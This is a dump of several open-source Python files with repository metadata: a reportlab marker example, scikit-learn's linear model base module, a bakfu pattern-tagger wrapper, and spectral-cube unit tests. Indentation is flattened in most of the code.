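#     from reportlab.lib import colors
#     marker = makeFilledDiamond(x=10, y=10, size=5, color=colors.red)
#     # 'marker' is a Polygon centred on (10, 10) that can be added to a
#     # reportlab Drawing.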
|
alexissmirnov/donomo
|
donomo_archive/lib/reportlab/graphics/charts/markers.py
|
Python
|
bsd-3-clause
| 1,801
|
"""
Generalized Linear models.
"""
# Author: Alexandre Gramfort <alexandre.gramfort@inria.fr>
# Fabian Pedregosa <fabian.pedregosa@inria.fr>
# Olivier Grisel <olivier.grisel@ensta.org>
# Vincent Michel <vincent.michel@inria.fr>
# Peter Prettenhofer <peter.prettenhofer@gmail.com>
# Mathieu Blondel <mathieu@mblondel.org>
# Lars Buitinck <L.J.Buitinck@uva.nl>
#
# License: BSD 3 clause
from __future__ import division
from abc import ABCMeta, abstractmethod
import numbers
import warnings
import numpy as np
import scipy.sparse as sp
from scipy import linalg
from scipy import sparse
from ..externals import six
from ..externals.joblib import Parallel, delayed
from ..base import BaseEstimator, ClassifierMixin, RegressorMixin
from ..utils import as_float_array, check_array, check_X_y, deprecated, column_or_1d
from ..utils.extmath import safe_sparse_dot
from ..utils.sparsefuncs import mean_variance_axis, inplace_column_scale
from ..utils.fixes import sparse_lsqr
from ..utils.validation import NotFittedError, check_is_fitted
###
### TODO: intercept for all models
### We should define a common function to center data instead of
### repeating the same code inside each fit method.
### TODO: bayesian_ridge_regression and bayesian_regression_ard
### should be squashed into their respective objects.
def sparse_center_data(X, y, fit_intercept, normalize=False):
"""
Compute information needed to center data to have mean zero along
    axis 0. Be aware that X will not be centered since it would break
    the sparsity, but it will be normalized if requested.
"""
if fit_intercept:
# we might require not to change the csr matrix sometimes
# store a copy if normalize is True.
# Change dtype to float64 since mean_variance_axis accepts
# it that way.
if sp.isspmatrix(X) and X.getformat() == 'csr':
X = sp.csr_matrix(X, copy=normalize, dtype=np.float64)
else:
X = sp.csc_matrix(X, copy=normalize, dtype=np.float64)
X_mean, X_var = mean_variance_axis(X, axis=0)
if normalize:
# transform variance to std in-place
# XXX: currently scaled to variance=n_samples to match center_data
X_var *= X.shape[0]
X_std = np.sqrt(X_var, X_var)
del X_var
X_std[X_std == 0] = 1
inplace_column_scale(X, 1. / X_std)
else:
X_std = np.ones(X.shape[1])
y_mean = y.mean(axis=0)
y = y - y_mean
else:
X_mean = np.zeros(X.shape[1])
X_std = np.ones(X.shape[1])
y_mean = 0. if y.ndim == 1 else np.zeros(y.shape[1], dtype=X.dtype)
return X, y, X_mean, y_mean, X_std
def center_data(X, y, fit_intercept, normalize=False, copy=True,
sample_weight=None):
"""
Centers data to have mean zero along axis 0. This is here because
nearly all linear models will want their data to be centered.
    If sample_weight is not None, then the weighted mean of X and y
    is set to zero, not the unweighted mean.
"""
X = as_float_array(X, copy)
if fit_intercept:
if isinstance(sample_weight, numbers.Number):
sample_weight = None
if sp.issparse(X):
X_mean = np.zeros(X.shape[1])
X_std = np.ones(X.shape[1])
else:
X_mean = np.average(X, axis=0, weights=sample_weight)
X -= X_mean
if normalize:
# XXX: currently scaled to variance=n_samples
X_std = np.sqrt(np.sum(X ** 2, axis=0))
X_std[X_std == 0] = 1
X /= X_std
else:
X_std = np.ones(X.shape[1])
y_mean = np.average(y, axis=0, weights=sample_weight)
y = y - y_mean
else:
X_mean = np.zeros(X.shape[1])
X_std = np.ones(X.shape[1])
y_mean = 0. if y.ndim == 1 else np.zeros(y.shape[1], dtype=X.dtype)
return X, y, X_mean, y_mean, X_std
def _rescale_data(X, y, sample_weight):
"""Rescale data so as to support sample_weight"""
n_samples = X.shape[0]
sample_weight = sample_weight * np.ones(n_samples)
sample_weight = np.sqrt(sample_weight)
sw_matrix = sparse.dia_matrix((sample_weight, 0),
shape=(n_samples, n_samples))
X = safe_sparse_dot(sw_matrix, X)
y = safe_sparse_dot(sw_matrix, y)
return X, y
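# A small sketch of the rescaling trick (illustrative values): multiplying the
# rows of X and y by sqrt(sample_weight) turns an ordinary least-squares fit
# into a weighted one.
#
#     X = np.array([[1.], [2.], [3.]])
#     y = np.array([1., 2., 3.])
#     Xw, yw = _rescale_data(X, y, sample_weight=np.array([1., 4., 9.]))
#     # rows are scaled by 1., 2. and 3. respectively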
class LinearModel(six.with_metaclass(ABCMeta, BaseEstimator)):
"""Base class for Linear Models"""
@abstractmethod
def fit(self, X, y):
"""Fit model."""
@deprecated(" and will be removed in 0.19.")
def decision_function(self, X):
"""Decision function of the linear model.
Parameters
----------
X : {array-like, sparse matrix}, shape = (n_samples, n_features)
Samples.
Returns
-------
C : array, shape = (n_samples,)
Returns predicted values.
"""
return self._decision_function(X)
def _decision_function(self, X):
check_is_fitted(self, "coef_")
X = check_array(X, accept_sparse=['csr', 'csc', 'coo'])
return safe_sparse_dot(X, self.coef_.T,
dense_output=True) + self.intercept_
def predict(self, X):
"""Predict using the linear model
Parameters
----------
X : {array-like, sparse matrix}, shape = (n_samples, n_features)
Samples.
Returns
-------
C : array, shape = (n_samples,)
Returns predicted values.
"""
return self._decision_function(X)
_center_data = staticmethod(center_data)
def _set_intercept(self, X_mean, y_mean, X_std):
"""Set the intercept_
"""
if self.fit_intercept:
self.coef_ = self.coef_ / X_std
self.intercept_ = y_mean - np.dot(X_mean, self.coef_.T)
else:
self.intercept_ = 0.
# XXX Should this derive from LinearModel? It should be a mixin, not an ABC.
# Maybe the n_features checking can be moved to LinearModel.
class LinearClassifierMixin(ClassifierMixin):
"""Mixin for linear classifiers.
Handles prediction for sparse and dense X.
"""
def decision_function(self, X):
"""Predict confidence scores for samples.
The confidence score for a sample is the signed distance of that
sample to the hyperplane.
Parameters
----------
X : {array-like, sparse matrix}, shape = (n_samples, n_features)
Samples.
Returns
-------
array, shape=(n_samples,) if n_classes == 2 else (n_samples, n_classes)
Confidence scores per (sample, class) combination. In the binary
case, confidence score for self.classes_[1] where >0 means this
class would be predicted.
"""
if not hasattr(self, 'coef_') or self.coef_ is None:
raise NotFittedError("This %(name)s instance is not fitted "
"yet" % {'name': type(self).__name__})
X = check_array(X, accept_sparse='csr')
n_features = self.coef_.shape[1]
if X.shape[1] != n_features:
raise ValueError("X has %d features per sample; expecting %d"
% (X.shape[1], n_features))
scores = safe_sparse_dot(X, self.coef_.T,
dense_output=True) + self.intercept_
return scores.ravel() if scores.shape[1] == 1 else scores
def predict(self, X):
"""Predict class labels for samples in X.
Parameters
----------
X : {array-like, sparse matrix}, shape = [n_samples, n_features]
Samples.
Returns
-------
C : array, shape = [n_samples]
Predicted class label per sample.
"""
scores = self.decision_function(X)
if len(scores.shape) == 1:
indices = (scores > 0).astype(np.int)
else:
indices = scores.argmax(axis=1)
return self.classes_[indices]
def _predict_proba_lr(self, X):
"""Probability estimation for OvR logistic regression.
Positive class probabilities are computed as
1. / (1. + np.exp(-self.decision_function(X)));
multiclass is handled by normalizing that over all classes.
"""
prob = self.decision_function(X)
prob *= -1
np.exp(prob, prob)
prob += 1
np.reciprocal(prob, prob)
if len(prob.shape) == 1:
return np.vstack([1 - prob, prob]).T
else:
# OvR normalization, like LibLinear's predict_probability
prob /= prob.sum(axis=1).reshape((prob.shape[0], -1))
return prob
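# A quick numeric check of the logistic mapping described in the docstring
# (illustrative decision values):
#
#     1. / (1. + np.exp(-0.0))  # -> 0.5
#     1. / (1. + np.exp(-2.0))  # -> ~0.88
#     # in the binary case the returned columns are (1 - p, p)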
class SparseCoefMixin(object):
"""Mixin for converting coef_ to and from CSR format.
L1-regularizing estimators should inherit this.
"""
def densify(self):
"""Convert coefficient matrix to dense array format.
Converts the ``coef_`` member (back) to a numpy.ndarray. This is the
default format of ``coef_`` and is required for fitting, so calling
this method is only required on models that have previously been
sparsified; otherwise, it is a no-op.
Returns
-------
self: estimator
"""
msg = "Estimator, %(name)s, must be fitted before densifying."
check_is_fitted(self, "coef_", msg=msg)
if sp.issparse(self.coef_):
self.coef_ = self.coef_.toarray()
return self
def sparsify(self):
"""Convert coefficient matrix to sparse format.
Converts the ``coef_`` member to a scipy.sparse matrix, which for
L1-regularized models can be much more memory- and storage-efficient
than the usual numpy.ndarray representation.
The ``intercept_`` member is not converted.
Notes
-----
For non-sparse models, i.e. when there are not many zeros in ``coef_``,
this may actually *increase* memory usage, so use this method with
care. A rule of thumb is that the number of zero elements, which can
be computed with ``(coef_ == 0).sum()``, must be more than 50% for this
to provide significant benefits.
After calling this method, further fitting with the partial_fit
method (if any) will not work until you call densify.
Returns
-------
self: estimator
"""
msg = "Estimator, %(name)s, must be fitted before sparsifying."
check_is_fitted(self, "coef_", msg=msg)
self.coef_ = sp.csr_matrix(self.coef_)
return self
class LinearRegression(LinearModel, RegressorMixin):
"""
Ordinary least squares Linear Regression.
Parameters
----------
fit_intercept : boolean, optional
whether to calculate the intercept for this model. If set
to false, no intercept will be used in calculations
(e.g. data is expected to be already centered).
normalize : boolean, optional, default False
If True, the regressors X will be normalized before regression.
copy_X : boolean, optional, default True
If True, X will be copied; else, it may be overwritten.
n_jobs : int, optional, default 1
The number of jobs to use for the computation.
        If -1, all CPUs are used. This will only provide a speedup for
        n_targets > 1 and sufficiently large problems.
Attributes
----------
coef_ : array, shape (n_features, ) or (n_targets, n_features)
Estimated coefficients for the linear regression problem.
If multiple targets are passed during the fit (y 2D), this
is a 2D array of shape (n_targets, n_features), while if only
one target is passed, this is a 1D array of length n_features.
intercept_ : array
Independent term in the linear model.
Notes
-----
From the implementation point of view, this is just plain Ordinary
Least Squares (scipy.linalg.lstsq) wrapped as a predictor object.
"""
def __init__(self, fit_intercept=True, normalize=False, copy_X=True,
n_jobs=1):
self.fit_intercept = fit_intercept
self.normalize = normalize
self.copy_X = copy_X
self.n_jobs = n_jobs
def fit(self, X, y, sample_weight=None):
"""
Fit linear model.
Parameters
----------
X : numpy array or sparse matrix of shape [n_samples,n_features]
Training data
y : numpy array of shape [n_samples, n_targets]
Target values
sample_weight : numpy array of shape [n_samples]
Individual weights for each sample
Returns
-------
self : returns an instance of self.
"""
n_jobs_ = self.n_jobs
X, y = check_X_y(X, y, accept_sparse=['csr', 'csc', 'coo'],
y_numeric=True, multi_output=True)
if ((sample_weight is not None) and np.atleast_1d(sample_weight).ndim > 1):
sample_weight = column_or_1d(sample_weight, warn=True)
X, y, X_mean, y_mean, X_std = self._center_data(
X, y, self.fit_intercept, self.normalize, self.copy_X,
sample_weight=sample_weight)
if sample_weight is not None:
# Sample weight can be implemented via a simple rescaling.
X, y = _rescale_data(X, y, sample_weight)
if sp.issparse(X):
if y.ndim < 2:
out = sparse_lsqr(X, y)
self.coef_ = out[0]
self.residues_ = out[3]
else:
                # sparse_lsqr cannot handle y with shape (M, K)
outs = Parallel(n_jobs=n_jobs_)(
delayed(sparse_lsqr)(X, y[:, j].ravel())
for j in range(y.shape[1]))
self.coef_ = np.vstack(out[0] for out in outs)
self.residues_ = np.vstack(out[3] for out in outs)
else:
self.coef_, self.residues_, self.rank_, self.singular_ = \
linalg.lstsq(X, y)
self.coef_ = self.coef_.T
if y.ndim == 1:
self.coef_ = np.ravel(self.coef_)
self._set_intercept(X_mean, y_mean, X_std)
return self
def _pre_fit(X, y, Xy, precompute, normalize, fit_intercept, copy,
Xy_precompute_order=None):
"""Aux function used at beginning of fit in linear models"""
n_samples, n_features = X.shape
if sparse.isspmatrix(X):
precompute = False
X, y, X_mean, y_mean, X_std = sparse_center_data(
X, y, fit_intercept, normalize)
else:
# copy was done in fit if necessary
X, y, X_mean, y_mean, X_std = center_data(
X, y, fit_intercept, normalize, copy=copy)
if hasattr(precompute, '__array__') and (
fit_intercept and not np.allclose(X_mean, np.zeros(n_features))
or normalize and not np.allclose(X_std, np.ones(n_features))):
warnings.warn("Gram matrix was provided but X was centered"
" to fit intercept, "
"or X was normalized : recomputing Gram matrix.",
UserWarning)
# recompute Gram
precompute = 'auto'
Xy = None
# precompute if n_samples > n_features
if precompute == 'auto':
precompute = (n_samples > n_features)
if precompute is True:
precompute = np.dot(X.T, X)
if Xy_precompute_order == 'F':
precompute = np.dot(X.T, X).T
if not hasattr(precompute, '__array__'):
Xy = None # cannot use Xy if precompute is not Gram
if hasattr(precompute, '__array__') and Xy is None:
if Xy_precompute_order == 'F':
Xy = np.dot(y.T, X).T
else:
Xy = np.dot(X.T, y)
return X, y, X_mean, y_mean, X_std, precompute, Xy
|
Fireblend/scikit-learn
|
sklearn/linear_model/base.py
|
Python
|
bsd-3-clause
| 16,019
|
# -*- coding: utf-8 -*-
'''
tag_pattern.py
This module is a wrapper around the pattern tagger.
'''
import os
import sys
import string
import six
import sklearn
from itertools import chain
from bakfu.core.routes import register
from bakfu.process.base import BaseProcessor
__errors__ = []
try:
import pattern.fr
except Exception:
e = sys.exc_info()
__errors__.append(e)
try:
import pattern.en
except Exception:
e = sys.exc_info()
if e[1].msg == "No module named 'pywordnet'":
            # py3 incompatibility; must be fixed in pattern
pass
else:
__errors__.append(e)
def tag(tagger, sentence):
    '''
    Run the given pattern parser over ``sentence`` and return the flat list
    of lemmas from every parsed sentence.
    '''
    lemmas = []
    for parsed_sentence in tagger(sentence, tokenize=True, tags=True,
                                  chunks=True, relations=True, lemmata=True,
                                  light=False):
        lemmas.extend(parsed_sentence.lemma)
    return lemmas
@register('tagging.pattern', __errors__)
class PatternTagger(BaseProcessor):
'''
Pre-processes data with pattern.
:Example:
.. doctest::
>>>from bakfu.examples.dataset1 import DATA
>>>import nltk
>>>baf = bakfu.Chain(lang="en")
>>>baf.load("data.simple",DATA)
>>>baf.process('tagging.pattern')
>>>baf.process('vectorize.sklearn',
... min_df = 2,
... ngram_range=(1, 3),
... #stop_words=nltk.corpus.stopwords.words(baf.get('language')),
... max_features=100,
        ...            tokenizer=lambda x:x,
        ...            preprocessor=lambda x:x,
        ...            )
>>>print(baf.get_chain("vectorizer").get_feature_names())
>>>print(baf.get_chain("vectorizer_result").toarray()[0])
'''
init_args = ()
init_kwargs = ()
run_args = ()
run_kwargs = ()
def __init__(self, *args, **kwargs):
super(PatternTagger, self).__init__(*args, **kwargs)
self.tagger = None
def run(self, caller, *args, **kwargs):
        '''
        Tag the chain's data source with the pattern parser and store the
        lemmatized result in a new data source.
        '''
super(PatternTagger, self).run(caller, *args, **kwargs)
data_source = caller.get_chain('data_source')
self.caller=caller
lang = caller.get('lang')
if lang == 'fr':
self.tagger = pattern.fr.parsetree
elif lang == 'en':
self.tagger = pattern.en.parsetree
cur_data = data_source.get_data()
result = [tag(self.tagger, s) for s in cur_data]
caller.data['result'] = result
#reformat data to ((id,data),...)
#note: data now contains lists of tokens instead of sentences
uids = data_source.get_uids()
new_data = zip(uids, result)
#Assign processed data to a new data source
new_data_source = self.caller.load_unchained("data.simple", new_data)
new_data_source.meta_data = {"tokenized":True}
self._data.update(
{'result':result,
'tagger_result':result,
'data_source':new_data_source,
})
return self
|
Succeed-Together/bakfu
|
process/tagging/tag_pattern.py
|
Python
|
bsd-3-clause
| 2,918
|
from __future__ import print_function, absolute_import, division
import warnings
import pytest
import numpy as np
from astropy import units as u
from astropy.wcs import WCS
from astropy.io import fits
from radio_beam import Beam, Beams
from .helpers import assert_allclose
from .test_spectral_cube import cube_and_raw
from ..spectral_cube import SpectralCube
from ..masks import BooleanArrayMask
from ..lower_dimensional_structures import (Projection, Slice, OneDSpectrum,
VaryingResolutionOneDSpectrum)
from ..utils import SliceWarning, WCSCelestialError, BeamUnitsError
from . import path
# needed for regression in numpy
import sys
try:
from astropy.utils.compat import NUMPY_LT_1_22
except ImportError:
# if astropy is an old version, we'll just skip the test
# (this is only used in one place)
NUMPY_LT_1_22 = False
# set up for parametrization
LDOs = (Projection, Slice, OneDSpectrum)
LDOs_2d = (Projection, Slice,)
two_qty_2d = np.ones((2,2)) * u.Jy
twelve_qty_2d = np.ones((12,12)) * u.Jy
two_qty_1d = np.ones((2,)) * u.Jy
twelve_qty_1d = np.ones((12,)) * u.Jy
data_two = (two_qty_2d, two_qty_2d, two_qty_1d)
data_twelve = (twelve_qty_2d, twelve_qty_2d, twelve_qty_1d)
data_two_2d = (two_qty_2d, two_qty_2d,)
data_twelve_2d = (twelve_qty_2d, twelve_qty_2d,)
def load_projection(filename):
hdu = fits.open(filename)[0]
proj = Projection.from_hdu(hdu)
return proj, hdu
@pytest.mark.parametrize(('LDO', 'data'),
zip(LDOs_2d, data_two_2d))
def test_slices_of_projections_not_projections(LDO, data):
# slices of projections that have <2 dimensions should not be projections
p = LDO(data, copy=False)
assert not isinstance(p[0,0], LDO)
assert not isinstance(p[0], LDO)
@pytest.mark.parametrize(('LDO', 'data'),
zip(LDOs_2d, data_twelve_2d))
def test_copy_false(LDO, data):
# copy the data so we can manipulate inplace without affecting other tests
image = data.copy()
p = LDO(image, copy=False)
image[3,4] = 2 * u.Jy
assert_allclose(p[3,4], 2 * u.Jy)
@pytest.mark.parametrize(('LDO', 'data'),
zip(LDOs, data_twelve))
def test_write(LDO, data, tmpdir):
p = LDO(data)
p.write(tmpdir.join('test.fits').strpath)
@pytest.mark.parametrize(('LDO', 'data'),
zip(LDOs_2d, data_twelve_2d))
def test_preserve_wcs_to(LDO, data):
# regression for #256
image = data.copy()
p = LDO(image, copy=False)
image[3,4] = 2 * u.Jy
p2 = p.to(u.mJy)
assert_allclose(p[3,4], 2 * u.Jy)
assert_allclose(p[3,4], 2000 * u.mJy)
assert p2.wcs == p.wcs
@pytest.mark.parametrize(('LDO', 'data'),
zip(LDOs, data_twelve))
def test_multiplication(LDO, data):
# regression: 265
p = LDO(data, copy=False)
p2 = p * 5
assert p2.unit == u.Jy
assert hasattr(p2, '_wcs')
assert p2.wcs == p.wcs
assert np.all(p2.value == 5)
@pytest.mark.parametrize(('LDO', 'data'),
zip(LDOs, data_twelve))
def test_unit_division(LDO, data):
# regression: 265
image = data
p = LDO(image, copy=False)
p2 = p / u.beam
assert p2.unit == u.Jy/u.beam
assert hasattr(p2, '_wcs')
assert p2.wcs == p.wcs
@pytest.mark.parametrize(('LDO', 'data'),
zip(LDOs_2d, data_twelve_2d))
def test_isnan(LDO, data):
# Check that np.isnan strips units
image = data.copy()
image[5,6] = np.nan
p = LDO(image, copy=False)
mask = np.isnan(p)
assert mask.sum() == 1
assert not hasattr(mask, 'unit')
@pytest.mark.parametrize(('LDO', 'data'),
zip(LDOs, data_twelve))
def test_self_arith(LDO, data):
image = data
p = LDO(image, copy=False)
p2 = p + p
assert hasattr(p2, '_wcs')
assert p2.wcs == p.wcs
assert np.all(p2.value==2)
p2 = p - p
assert hasattr(p2, '_wcs')
assert p2.wcs == p.wcs
assert np.all(p2.value==0)
@pytest.mark.parametrize(('LDO', 'data'),
zip(LDOs, data_twelve))
def test_self_arith_with_beam(LDO, data):
exp_beam = Beam(1.0 * u.arcsec)
image = data
p = LDO(image, copy=False)
p = p.with_beam(exp_beam)
p2 = p + p
assert hasattr(p2, '_wcs')
assert p2.wcs == p.wcs
assert np.all(p2.value==2)
assert p2.beam == exp_beam
p2 = p - p
assert hasattr(p2, '_wcs')
assert p2.wcs == p.wcs
assert np.all(p2.value==0)
assert p2.beam == exp_beam
@pytest.mark.xfail(raises=ValueError, strict=True)
def test_VRODS_wrong_beams_shape():
'''
Check that passing Beams with a different shape than the data
is caught.
'''
exp_beams = Beams(np.arange(1, 4) * u.arcsec)
p = VaryingResolutionOneDSpectrum(twelve_qty_1d, copy=False,
beams=exp_beams)
def test_VRODS_with_beams():
exp_beams = Beams(np.arange(1, twelve_qty_1d.size + 1) * u.arcsec)
p = VaryingResolutionOneDSpectrum(twelve_qty_1d, copy=False, beams=exp_beams)
assert (p.beams == exp_beams).all()
new_beams = Beams(np.arange(2, twelve_qty_1d.size + 2) * u.arcsec)
p = p.with_beams(new_beams)
assert np.all(p.beams == new_beams)
def test_VRODS_slice_with_beams():
exp_beams = Beams(np.arange(1, twelve_qty_1d.size + 1) * u.arcsec)
p = VaryingResolutionOneDSpectrum(twelve_qty_1d, copy=False,
wcs=WCS(naxis=1),
beams=exp_beams)
assert np.all(p[:5].beams == exp_beams[:5])
def test_VRODS_arith_with_beams():
exp_beams = Beams(np.arange(1, twelve_qty_1d.size + 1) * u.arcsec)
p = VaryingResolutionOneDSpectrum(twelve_qty_1d, copy=False, beams=exp_beams)
p2 = p + p
assert hasattr(p2, '_wcs')
assert p2.wcs == p.wcs
assert np.all(p2.value==2)
assert np.all(p2.beams == exp_beams)
p2 = p - p
assert hasattr(p2, '_wcs')
assert p2.wcs == p.wcs
assert np.all(p2.value==0)
assert np.all(p2.beams == exp_beams)
def test_onedspectrum_specaxis_units():
test_wcs = WCS(naxis=1)
test_wcs.wcs.cunit = ["m/s"]
test_wcs.wcs.ctype = ["VELO-LSR"]
p = OneDSpectrum(twelve_qty_1d, wcs=test_wcs)
assert p.spectral_axis.unit == u.Unit("m/s")
def test_onedspectrum_with_spectral_unit():
test_wcs = WCS(naxis=1)
test_wcs.wcs.cunit = ["m/s"]
test_wcs.wcs.ctype = ["VELO-LSR"]
p = OneDSpectrum(twelve_qty_1d, wcs=test_wcs)
p_new = p.with_spectral_unit(u.km/u.s)
assert p_new.spectral_axis.unit == u.Unit("km/s")
np.testing.assert_equal(p_new.spectral_axis.value,
1e-3*p.spectral_axis.value)
def test_onedspectrum_input_mask_type():
test_wcs = WCS(naxis=1)
test_wcs.wcs.cunit = ["m/s"]
test_wcs.wcs.ctype = ["VELO-LSR"]
np_mask = np.ones(twelve_qty_1d.shape, dtype=bool)
np_mask[1] = False
bool_mask = BooleanArrayMask(np_mask, wcs=test_wcs,
shape=np_mask.shape)
# numpy array
p = OneDSpectrum(twelve_qty_1d, wcs=test_wcs,
mask=np_mask)
assert (p.mask.include() == bool_mask.include()).all()
# MaskBase
p = OneDSpectrum(twelve_qty_1d, wcs=test_wcs,
mask=bool_mask)
assert (p.mask.include() == bool_mask.include()).all()
# No mask
ones_mask = BooleanArrayMask(np.ones(twelve_qty_1d.shape, dtype=bool),
wcs=test_wcs, shape=np_mask.shape)
p = OneDSpectrum(twelve_qty_1d, wcs=test_wcs,
mask=None)
assert (p.mask.include() == ones_mask.include()).all()
def test_slice_tricks():
test_wcs_1 = WCS(naxis=1)
test_wcs_2 = WCS(naxis=2)
spec = OneDSpectrum(twelve_qty_1d, wcs=test_wcs_1)
im = Slice(twelve_qty_2d, wcs=test_wcs_2)
with warnings.catch_warnings(record=True) as w:
new = spec[:,None,None] * im[None,:,:]
assert new.ndim == 3
# two warnings because we're doing BOTH slices!
assert len(w) == 2
assert w[0].category == SliceWarning
with warnings.catch_warnings(record=True) as w:
new = spec.array[:,None,None] * im.array[None,:,:]
assert new.ndim == 3
assert len(w) == 0
def test_array_property():
test_wcs_1 = WCS(naxis=1)
spec = OneDSpectrum(twelve_qty_1d, wcs=test_wcs_1)
arr = spec.array
    # these are supposed to be the same object, but the 'is' test fails!
assert spec.array.data == spec.data
assert isinstance(arr, np.ndarray)
assert not isinstance(arr, u.Quantity)
def test_quantity_property():
test_wcs_1 = WCS(naxis=1)
spec = OneDSpectrum(twelve_qty_1d, wcs=test_wcs_1)
arr = spec.quantity
    # these are supposed to be the same object, but the 'is' test fails!
assert spec.array.data == spec.data
assert isinstance(arr, u.Quantity)
assert not isinstance(arr, OneDSpectrum)
def test_projection_with_beam(data_55):
exp_beam = Beam(1.0 * u.arcsec)
proj, hdu = load_projection(data_55)
# uses from_hdu, which passes beam as kwarg
assert proj.beam == exp_beam
assert proj.meta['beam'] == exp_beam
# load beam from meta
exp_beam = Beam(1.5 * u.arcsec)
meta = {"beam": exp_beam}
new_proj = Projection(hdu.data, wcs=proj.wcs, meta=meta)
assert new_proj.beam == exp_beam
assert new_proj.meta['beam'] == exp_beam
# load beam from given header
exp_beam = Beam(2.0 * u.arcsec)
header = hdu.header.copy()
header = exp_beam.attach_to_header(header)
new_proj = Projection(hdu.data, wcs=proj.wcs, header=header,
read_beam=True)
assert new_proj.beam == exp_beam
assert new_proj.meta['beam'] == exp_beam
# load beam from beam object
exp_beam = Beam(3.0 * u.arcsec)
header = hdu.header.copy()
del header["BMAJ"], header["BMIN"], header["BPA"]
new_proj = Projection(hdu.data, wcs=proj.wcs, header=header,
beam=exp_beam)
assert new_proj.beam == exp_beam
assert new_proj.meta['beam'] == exp_beam
# Slice the projection with a beam and check it's still there
assert new_proj[:1, :1].beam == exp_beam
def test_onedspectrum_with_beam():
exp_beam = Beam(1.0 * u.arcsec)
test_wcs_1 = WCS(naxis=1)
spec = OneDSpectrum(twelve_qty_1d, wcs=test_wcs_1)
# load beam from meta
meta = {"beam": exp_beam}
new_spec = OneDSpectrum(spec.data, wcs=spec.wcs, meta=meta)
assert new_spec.beam == exp_beam
assert new_spec.meta['beam'] == exp_beam
# load beam from given header
hdu = spec.hdu
exp_beam = Beam(2.0 * u.arcsec)
header = hdu.header.copy()
header = exp_beam.attach_to_header(header)
new_spec = OneDSpectrum(hdu.data, wcs=spec.wcs, header=header,
read_beam=True)
assert new_spec.beam == exp_beam
assert new_spec.meta['beam'] == exp_beam
# load beam from beam object
exp_beam = Beam(3.0 * u.arcsec)
header = hdu.header.copy()
new_spec = OneDSpectrum(hdu.data, wcs=spec.wcs, header=header,
beam=exp_beam)
assert new_spec.beam == exp_beam
assert new_spec.meta['beam'] == exp_beam
# Slice the spectrum with a beam and check it's still there
assert new_spec[:1].beam == exp_beam
@pytest.mark.parametrize(('LDO', 'data'),
zip(LDOs, data_twelve))
def test_ldo_attach_beam(LDO, data):
exp_beam = Beam(1.0 * u.arcsec)
newbeam = Beam(2.0 * u.arcsec)
p = LDO(data, copy=False, beam=exp_beam)
new_p = p.with_beam(newbeam)
assert p.beam == exp_beam
assert p.meta['beam'] == exp_beam
assert new_p.beam == newbeam
assert new_p.meta['beam'] == newbeam
@pytest.mark.xfail(raises=BeamUnitsError, strict=True)
@pytest.mark.parametrize(('LDO', 'data'),
zip(LDOs, data_twelve))
def test_ldo_attach_beam_jybm_error(LDO, data):
exp_beam = Beam(1.0 * u.arcsec)
newbeam = Beam(2.0 * u.arcsec)
data = data.value * u.Jy / u.beam
p = LDO(data, copy=False, beam=exp_beam)
# Attaching with no beam should work.
new_p = p.with_beam(newbeam)
# Trying to change the beam should now raise a BeamUnitsError
new_p = new_p.with_beam(newbeam)
@pytest.mark.parametrize(('LDO', 'data'),
zip(LDOs_2d, data_two_2d))
def test_projection_from_hdu(LDO, data):
p = LDO(data, copy=False)
hdu = p.hdu
p_new = LDO.from_hdu(hdu)
assert (p == p_new).all()
def test_projection_subimage(data_55):
proj, hdu = load_projection(data_55)
proj1 = proj.subimage(xlo=1, xhi=3)
proj2 = proj.subimage(xlo=24.06269 * u.deg,
xhi=24.06206 * u.deg)
proj3 = proj.subimage(xlo=24.06269*u.deg, xhi=3)
proj4 = proj.subimage(xlo=1, xhi=24.06206*u.deg)
assert proj1.shape == (5, 2)
assert proj2.shape == (5, 2)
assert proj3.shape == (5, 2)
assert proj4.shape == (5, 2)
assert proj1.wcs.wcs.compare(proj2.wcs.wcs)
assert proj1.wcs.wcs.compare(proj3.wcs.wcs)
assert proj1.wcs.wcs.compare(proj4.wcs.wcs)
assert proj.beam == proj1.beam
assert proj.beam == proj2.beam
proj4 = proj.subimage(ylo=1, yhi=3)
proj5 = proj.subimage(ylo=29.93464 * u.deg,
yhi=29.93522 * u.deg)
proj6 = proj.subimage(ylo=1, yhi=29.93522 * u.deg)
proj7 = proj.subimage(ylo=29.93464 * u.deg, yhi=3)
assert proj4.shape == (2, 5)
assert proj5.shape == (2, 5)
assert proj6.shape == (2, 5)
assert proj7.shape == (2, 5)
assert proj4.wcs.wcs.compare(proj5.wcs.wcs)
assert proj4.wcs.wcs.compare(proj6.wcs.wcs)
assert proj4.wcs.wcs.compare(proj7.wcs.wcs)
# Test mixed slicing in both spatial directions
proj1xy = proj.subimage(xlo=1, xhi=3, ylo=1, yhi=3)
proj2xy = proj.subimage(xlo=24.06269*u.deg, xhi=3,
ylo=1,yhi=29.93522 * u.deg)
proj3xy = proj.subimage(xlo=1, xhi=24.06206*u.deg,
ylo=29.93464 * u.deg, yhi=3)
assert proj1xy.shape == (2, 2)
assert proj2xy.shape == (2, 2)
assert proj3xy.shape == (2, 2)
assert proj1xy.wcs.wcs.compare(proj2xy.wcs.wcs)
assert proj1xy.wcs.wcs.compare(proj3xy.wcs.wcs)
proj5 = proj.subimage()
assert proj5.shape == proj.shape
assert proj5.wcs.wcs.compare(proj.wcs.wcs)
assert np.all(proj5.value == proj.value)
def test_projection_subimage_nocelestial_fail(data_255_delta, use_dask):
cube, data = cube_and_raw(data_255_delta, use_dask=use_dask)
proj = cube.moment0(axis=1)
with pytest.raises(WCSCelestialError,
match="WCS does not contain two spatial axes."):
proj.subimage(xlo=1, xhi=3)
@pytest.mark.parametrize('LDO', LDOs_2d)
def test_twod_input_mask_type(LDO):
test_wcs = WCS(naxis=2)
test_wcs.wcs.cunit = ["deg", "deg"]
test_wcs.wcs.ctype = ["RA---SIN", 'DEC--SIN']
np_mask = np.ones(twelve_qty_2d.shape, dtype=bool)
np_mask[1] = False
bool_mask = BooleanArrayMask(np_mask, wcs=test_wcs,
shape=np_mask.shape)
# numpy array
p = LDO(twelve_qty_2d, wcs=test_wcs,
mask=np_mask)
assert (p.mask.include() == bool_mask.include()).all()
# MaskBase
p = LDO(twelve_qty_2d, wcs=test_wcs,
mask=bool_mask)
assert (p.mask.include() == bool_mask.include()).all()
# No mask
ones_mask = BooleanArrayMask(np.ones(twelve_qty_2d.shape, dtype=bool),
wcs=test_wcs, shape=np_mask.shape)
p = LDO(twelve_qty_2d, wcs=test_wcs,
mask=None)
assert (p.mask.include() == ones_mask.include()).all()
@pytest.mark.xfail
def test_mask_convolve():
# Numpy is fundamentally incompatible with the objects we have created.
# np.ma.is_masked(array) checks specifically for the array's _mask
